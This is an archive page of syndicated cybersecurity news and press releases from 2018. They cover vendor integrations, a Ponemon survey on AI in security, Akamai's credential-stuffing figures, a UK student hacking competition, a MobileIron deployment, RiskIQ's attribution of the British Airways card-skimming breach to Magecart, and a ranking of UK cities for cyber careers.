Author Archives: Dean Alvarez

Integration with Cisco Technologies Delivers IT / ICS Security

Large organizations utilize a variety of technologies and solutions to create cyber resiliency, an important part of the best practice known as Defense in Depth. But, using disparate systems can actually result in increased security exposure and risks, and slower response to threats.

A few years ago, Cisco began working with the best and brightest minds around the world to address this issue. This led to the creation of their security technology program, which included an open platform for collaboration called the Cisco Security Technology Alliance (CSTA).

Nozomi Networks has integrated its ICS security solution with the CSTA to deliver comprehensive operational visibility and cyber security across IT/OT networks.

Nozomi Networks Integrates with Cisco Security Policy Platform and Devices

The CSTA provides an environment for leading security solution providers like us to integrate with Cisco APIs and SDKs across the Cisco security portfolio.

Nozomi Networks kicked off membership in CSTA with security integration for Cisco’s Identity Services Engine (ISE).

The Identity Services Engine (ISE) is a security policy management platform that helps organizations manage users and devices on business networks. Sharing contextual usage data amongst IT systems and solutions makes it much easier to enforce policies for resource access, and more.

If you want to learn more click here

The post Integration with Cisco Technologies Delivers IT / ICS Security appeared first on IT SECURITY GURU.

Global Study Finds Artificial Intelligence is Key Cybersecurity Weapon in the IoT Era

As businesses struggle to combat increasingly sophisticated cybersecurity attacks, the severity of which is exacerbated by both the vanishing IT perimeters in today’s mobile and IoT era, coupled with an acute shortage of skilled security professionals, IT security teams need both a new approach and powerful new tools to protect data and other high-value assets. Increasingly, they are looking to artificial intelligence (AI) as a key weapon to win the battle against stealthy threats inside their IT infrastructures, according to a new global research study conducted by the Ponemon Institute on behalf of Aruba, a Hewlett Packard Enterprise company (NYSE:HPE).

The Ponemon Institute study, entitled “Closing the IT Security Gap with Automation & AI in the Era of IoT,” surveyed 4,000 security and IT professionals across the Americas, Europe and Asia to understand what makes security deficiencies so hard to fix, and what types of technologies and processes are needed to stay a step ahead of bad actors within the new threat landscape.

The research revealed that in the quest to protect data and other high-value assets, security systems incorporating machine learning and other AI-based technologies are essential for detecting and stopping attacks that target users and IoT devices. The majority of respondents agree that security products with AI functionality will help to:

  • Reduce false alerts (68 percent)
  • Increase their team’s effectiveness (63 percent)
  • Provide greater investigation efficiencies (60 percent)
  • Advance their ability to more quickly discover and respond to stealthy attacks that have evaded perimeter defense systems (56 percent)

Twenty-five percent of respondents said they currently use some form of an AI-based security solution, with another 26 percent stating they plan on deploying these types of products within the next 12 months.

Current Security Tools are not Enough

“Despite massive investments in cybersecurity programs, our research found most businesses are still unable to stop advanced, targeted attacks – with 45 percent believing they are not realizing the full value of their defense arsenal, which ranges from 10 to 75 security solutions,” said Larry Ponemon, chairman, Ponemon Institute. “The situation has become a ‘perfect storm,’ with nearly half of respondents saying it’s very difficult to protect complex and dynamically changing attack surfaces, especially given the current lack of security staff with the necessary skills and expertise to battle today’s persistent, sophisticated, highly trained, and well-financed attackers. Against this backdrop, AI-based security tools, which can automate tasks and free up IT personnel to manage other aspects of a security program, were viewed as critical for helping businesses keep up with increasing threat levels.”

IoT and Cloud Adds Significant Risk

Ponemon researchers found that the majority of IT security teams believe that a key gap in their company’s overall security strategy is their inability to identify attacks that use IoT devices as the point of entry. In fact, more than three-quarters of respondents believe their IoT devices are not secure, with 60 percent stating even simple IoT devices pose a threat. Two-thirds of respondents admitted they have little or no ability to protect their “things” from attacks. Continuous monitoring of network traffic, closed-loop detection and response systems, and detecting behavioral anomalies among peer groups of IoT devices, were cited as the most effective approaches to better protect their environments.

Even the ownership model for IoT security presents potential risk. When asked who inside their organization was responsible for IoT security, responses ranged from the CIO, CISO, CTO, and line-of-business leaders, with no majority consensus. Only 33 percent identified the CIO, with no other executive or functional group achieving response totals above 20 percent. Surprisingly, “No Function” was the third-highest answer (15 percent).

Survey results also highlighted the importance of visibility and the ability to define which resources that people and IoT devices can access, with 63 percent of respondents stating network access control is an important element of their company’s overall security strategy and critical for reducing the reach of inside exploits. Also cited as important was having detailed information about applications (71 percent), endpoints (69 percent), cloud (64 percent), and networks (63 percent), with more than half saying they currently deploy network access control solutions for enabling visibility and control across both wired and wireless networks.

Additionally, more than half of respondents said it’s hard to protect expanding and blurring IT perimeters resulting from requirements to concurrently support IoT, BYOD, mobile, and cloud initiatives (55%).

“Partnering with the Ponemon Institute helps us to improve customer experiences by better understanding security teams’ challenges, and then arming them with advanced solutions that enable quick identification and responses to an ever-changing threat landscape,” said Larry Lunetta, vice president of security solutions marketing for Aruba. “The insight gained from this study enables us to continually improve our ability to provide an enterprise wired and wireless network security framework with an integrated and more comprehensive approach for gaining back visibility and control.”

The post Global Study Finds Artificial Intelligence is Key Cybersecurity Weapon in the IoT Era appeared first on IT SECURITY GURU.

Akamai Credential Stuffing Report Shows Financial Services Industry Under Constant Attack From Automated Account Takeover Tools

According to the Akamai 2018 State of the Internet / Security Credential Stuffing Attacks report, worldwide malicious login attempts are on the rise. Findings from the report show that Akamai detected approximately 3.2 billion malicious logins per month from January through April 2018, and over 8.3 billion malicious login attempts from bots in May and June 2018 – a monthly average increase of 30 percent. In total, from the beginning of November 2017 through the end of June 2018, Akamai researcher analysis shows more than 30 billion malicious login attempts during the eight-month period.

Malicious login attempts result from credential stuffing, where hackers systematically use botnets to try stolen login information across the web. They target login pages for banks and retailers on the premise that many customers use the same login credentials for multiple services and accounts. Credential stuffing can cost organisations millions to tens of millions of dollars in fraud losses annually, according to the Ponemon Institute’s “The Cost of Credential Stuffing” report.

Akamai security and threat research plus behavioural detections power the company’s bot management technology, and Akamai’s Vice President of Web Security, Josh Shaul, shared an example of combating credential abuse on behalf of a customer. “One of the world’s largest financial services companies was experiencing over 8,000 account takeovers per month, which led to more than $100,000 per day in direct fraud-related losses,” said Shaul. “The company turned to Akamai to put behavioural-based bot detections in front of every consumer login endpoint and immediately saw a drastic reduction in account takeovers to just one to three per month and fraud-related losses down to only $1,000 to $2,000 per day.”

In addition, the State of the Internet report details two instances where Akamai combatted credential stuffing attempts for clients, demonstrating the severity of the method.

In the first case, the report recounts the issues faced by a Fortune 500 financial services institution where attackers used a botnet to conduct 8.5 million malicious login attempts within 48 hours against a site that typically only sees seven million login attempts in a week. More than 20,000 devices were involved in this botnet, which was capable of sending hundreds of requests a minute. Akamai research identified that nearly one-third of the traffic in this particular attack was generated from Vietnam and the United States.

The second real-world example from the report illustrates a “low and slow” type of attack identified at a credit union earlier this year. This financial institution saw a large spike in malicious login attempts, which ultimately revealed a trio of botnets targeting its site. While a particularly noisy botnet caught their attention, the discovery of a botnet that had been very slowly and methodically trying to break in created a much bigger concern.

“Our research shows that the people carrying out credential stuffing attacks are continuously evolving their arsenal. They vary their methodologies, from noisier, volume-based attacks, through stealth-like ‘low and slow’-style attacks,” said Martin McKeay, Senior Security Advocate at Akamai and Lead Author of the State of the Internet / Security report. “It’s especially alarming when we see multiple attacks simultaneously affecting a single target. Without specific expertise and tools needed to defend against these blended, multi-headed campaigns, organisations can easily miss some of the most dangerous credential attacks.”

A complimentary copy of the 2018 State of the Internet / Security Credential Stuffing Attacks report is available for download here. For additional information about the rise of credential stuffing challenges and ways to protect your organisation against them, visit here.

The post Akamai Credential Stuffing Report Shows Financial Services Industry Under Constant Attack From Automated Account Takeover Tools appeared first on IT SECURITY GURU.

Future UK Cyber Security Stars Tackle Vulnerable Cryptocurrency in Latest Challenges

On Friday, Her Majesty’s Government Communications Centre (HMGCC) and leading science and engineering company QinetiQ hosted the latest Cyber Security Challenge UK Face-to-Face competition at QinetiQ’s headquarters in Farnborough. The competition saw 28 code-breaking amateurs from across the country ethically hack the cryptocurrency wallets of customers from a fictitious bank. The challenges, which put contestants’ cryptography, problem-solving, automation and scripting skills to the test, included breaking into digital vaults and delivering presentations to expectant board members.

With crypto wallets making headlines in the news recently and cryptocurrencies such as Bitcoin reaching incredible worth, it is no wonder that Action Fraud found that cryptocurrency fraud created more than £2 million of losses this summer. It is therefore crucial that the systems and services people use are safe, secure and tested by highly skilled cyber security experts before people invest and store money in them thereby ensuring a high enough level of protection.

To highlight these contemporary issues, HMGCC and QinetiQ have worked in partnership to develop one of the most challenging face-to-face competitions in Cyber Security Challenge UK history as validated by HMGCC interns – who road-tested the challenges while on placement there within their NCSC CyberFirst bursary programme. Teams pulled from the technical minds of experienced staff and graduates from both companies created the digital challenges for the contestants to battle their way through on the day, and HMGCC lent their manufacturing skills to create a vault to be cracked as well.

The scenario in particular was based on a mock company QQGCC – a new cryptocurrency bank – which, in a move of confidence, publicly listed the encrypted wallets of each customer account. To avoid the high-profile security errors of other companies before them, QQGCC allowed customers to choose their own system to hide the key that would ultimately give people access to the account. With each customer choosing a unique method to conceal their account’s encryption key, candidates were tasked with fool-proofing each system by attempting to hack their way into the accounts and discover which character’s money would be at risk.

“We really wanted to push the contestants and seriously test their skill sets. Digital wallets and cryptocurrencies may not feel like money, but they have genuine real-world value that needs to be protected,” said Ashleigh Curnow from HMGCC’s Recruitment Team. “Supporting competitions and initiatives with Cyber Security Challenge UK and QinetiQ provides a brilliant platform for uncovering and nurturing cyber security talent while also highlighting the need for due diligence to be carried out with digital security. We’ve been really impressed with the skills and determination we have seen from all of the competitors and we are excited to see that the UK is continuing to develop the engineers that we need.”

This latest event also acted as the final semi-final round of Cyber Security Challenges UK’s 2018 Masterclass competition, with the top performers earning a place at the Masterclass Grand Final at Barclays in Canary Wharf in November. In order to qualify, for the face-to-face competition each contestant had to pass rigorous online tests which created a diverse group of people taking part, including seven people aged 30 or over and nearly half of the contestants aged 18 or under.

“It has been amazing to see the number of talented and skilled individuals taking part in this competition. The great thing about these challenges is it helps demonstrate to people how many career paths and opportunities are open to them. Cyber security is a vibrant and exciting sector to work in and we are pleased to showcase that with the help of our expert cyber security specialists,” said Bryan Lillie, Chief Technical Officer Cyber Security at QinetiQ. “All of the contestants in today’s competition displayed the skills we would look for when hiring talent for our own security teams. Congratulations to the winners, for a well-deserved result.”

The winning team, Great Hyperlobic Omnicognate Neutron Wrangler, was comprised of:

  • Callum, 17, an A-level student from London who also played Cyber Discovery this year
  • Daniel, 17, an A-level student from Stoke-on-Trent
  • Yousef, 18, an intern from St Albans
  • Edmund, 18, an A-level student from London
  • Laura, 37, an IT Technical Support professional (non-cyber security related) from Lincolnshire

Colin Lobley, CEO of Cyber Security Challenge UK added: “It was great to see that the latest challenge with QinetiQ and HMGCC not only attracted young, talented school and university students, but also people looking for career changes too. The cyber security industry has the need for a range of skills, from computer experts to psychologists, communicators and policy-makers. What we are looking for is those with an inquisitive mind. It is therefore crucial that we continue to partner with forward-thinking organisations such as HMGCC and QinetiQ to identify and inform people about what is on offer when choosing a career in cyber security.”

Those interested in learning more about a career in cyber security should attend the upcoming Cyber Re:coded event which is taking place in Tobacco Dock in London from October 15-16. During the two-day event there will be talks from security professionals, industry leaders and interactive workshops aimed at showing the large number of career opportunities on offer in the security industry. So, whether you want to spot and analyse the latest threats; design resilient digital cities, cars or games; stop counterfeiting; reverse-engineer mobile apps; shape new laws; profile cyber criminals; or develop cyber services in the age of AI and Quantum computing, the cyber security industry needs you!

For more information on Cyber Security Challenge UK and the work it is doing, please visit: https://www.cybersecuritychallenge.org.uk/

The post Future UK Cyber Security Stars Tackle Vulnerable Cryptocurrency in Latest Challenges appeared first on IT SECURITY GURU.

City of Stockholm Selects MobileIron Threat Defense to Detect and Mitigate Mobile Threats

MobileIron, the secure foundation for modern work, today announced that City of Stockholm has selected MobileIron Threat Defense to detect and mitigate mobile threats. MobileIron Threat Defense will be deployed on 30,000 mobile devices used by the employees of the City of Stockholm.

MobileIron Threat Defense provides unparalleled mobile threat protection, securing mobile devices from device, network, and app threats. Organizations can protect sensitive data by detecting and remediating known and zero-day threats on mobile devices with no need for the users to take any action to activate or deploy the app.

“City of Stockholm employees rely on their mobile devices to increase their work efficiency,” said Constantinos Amiridis, solution architect, City of Stockholm. “With MobileIron Threat Defense, we can give our employees the peace of mind to safely use their devices without any data being compromised.”

“City of Stockholm has always been at the forefront of technology, deploying innovative solutions that help its many departments perform with agility and efficiency,” said Simon Biddiscombe, CEO, MobileIron. “Today, through its selection of MobileIron Threat Defense, City of Stockholm has yet again shown its commitment to working with best-in-class technology to keep its workforce secure and productive.”

The post City of Stockholm Selects MobileIron Threat Defense to Detect and Mitigate Mobile Threats appeared first on IT SECURITY GURU.

RiskIQ implicates Magecart in breach of British Airways

RiskIQ, the global leader in digital risk management, today revealed that its researchers traced the breach of 380,000 sets of payment information belonging to customers of British Airways to Magecart, the credit-card skimming group made infamous for its July breach of Ticketmaster.

Because the attack was reported by British Airways to be web-based and targeting credit card data, RiskIQ researchers strongly suspected Magecart was behind it. Leveraging the company’s global web-crawling network, which maintains a map of the internet and enables security practitioners to analyse web pages and their components as they appear through time, they confirmed that assumption.

The attack was similar to the one leveled against Ticketmaster with one key difference: instead of compromising commonly used third-party functionality to gain access to hundreds of sites at once, Magecart operatives compromised the British Airways site directly and planned their attack around the site’s unique structure and functionality. RiskIQ’s data shows that scripts supporting the functionality of the payment forms on the British Airways’ website were copied and modified to deliver payment information to an attacker-controlled server while maintaining their intended functionality to avoid detection.

The attackers were also aware of the way the British Airways mobile app was constructed, leveraging the fact that it used much of the same functionality as the web-app and could, therefore, victimise users in the same way.  

“This attack is a highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer,” said Yonathan Klijnsma, head researcher at RiskIQ. “This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.”

The researchers also found evidence that Magecart operatives may have breached the British Airways site several days before the skimming began. RiskIQ web-crawling data shows that a certificate used on the attacker’s command and control server was issued on August 15, nearly a week before the reported start date of the attack on August 21.

RiskIQ, which detects internet-scale threats, is alerted to new Magecart breaches hourly, a clear indication that the group is extremely active and a very real threat to all organisations offering online payment facilities. For a full analysis of this campaign, including a list of compromised components and IOCs, visit the report here: https://www.riskiq.com/blog/labs/magecart-british-airways-breach/

The post RiskIQ implicates Magecart in breach of British Airways appeared first on IT SECURITY GURU.

Cyber Security City Ranking reveals the cities best placed to attract cyber talent

Cyber security training facility Crucial Academy has released the 2018 Cyber Security City Ranking, revealing the best cities for cyber security professionals, with Reading, Leeds and Cardiff topping the table.

Analysing four factors, including salary, affordability, job availability and tech sector growth potential, the ranking sought to uncover which cities may be most attractive to those already working in or considering cyber security as a career path.

Reading in Berkshire, home to a wide variety of major international tech companies, topped the ranking, performing particularly well for job availability and salary. Leeds closely followed, gaining big points for the potential growth of its tech sector, whilst Cardiff ranked in third place, scoring top points for affordability.

With the predicted future shortfall of cyber security professionals, Crucial was keen to research the factors which may render some cities more attractive to this much needed specialist talent. A 2016 skills gap analysis from ISACA estimated a global shortage of 2 million cybersecurity professionals by 2019, according to the UK House of Lords Digital Skills Committee.

Tom Marcus, former MI5 spy and best-selling author of Soldier Spy, and who partners with Crucial Academy, said: “Cyber security is one of the most serious issues UK business faces today. For young people leaving education, ex-military people looking to transition to civilian life or those looking for a career change, there is no career no more Brexit-proof than cyber security.”.

The top 10 cities can be seen below:

Rank City Salary Score Affordability Score Job Availability Score Tech Growth Potential Score TOTAL SCORE
1 Reading 8.3 7.3 10 8.1 33.7
2 Leeds 7.7 7.9 7.5 9.7 32.8
3 Cardiff 9.3 10 4.2 8 31.5
4 Edinburgh 8.5 8.2 4.7 9.7 31.1
5 Manchester 7.8 7.5 6.6 8.9 30.8
6 London 10 5.9 5.2 8.2 29.3
7 Glasgow 8.1 8.4 4.2 8.5 29.2
8 Newcastle 8.4 9.2 3.2 8 28.8
9 Brighton 7.8 6.5 4.7 9.7 28.7
10 Bristol 7.5 6.7 4.6 9.3 28.1

Neil Williams, CEO of Crucial Academy, added: “The cyber security skills gap is a growing issue across the UK. Every city in the ranking is a tech hub within its own right, however, it is fascinating to see which cities, based on these factors, may be more attractive to the much-needed talent pool of cyber security professionals.”

Other findings from the top 10 included:

Best cities for salaries: London followed closely by Cardiff and Edinburgh.

Best cities for affordability: Cardiff closely followed by Newcastle and Glasgow.

Best cities for job availability: Reading followed by Leeds and Manchester.

Best cities for tech sector growth potential: Leeds, Edinburgh and Brighton all placed highest with the same score.

Crucial Academy is run by a team of former Royal Marines Commandos and provides free cyber security training, accredited qualifications and careers for ex-servicemen and women looking for a path back to Civvy Street.

For further information please visit https://academy.crucialgroup.co.uk.

The post Cyber Security City Ranking reveals the cities best placed to attract cyber talent appeared first on IT SECURITY GURU.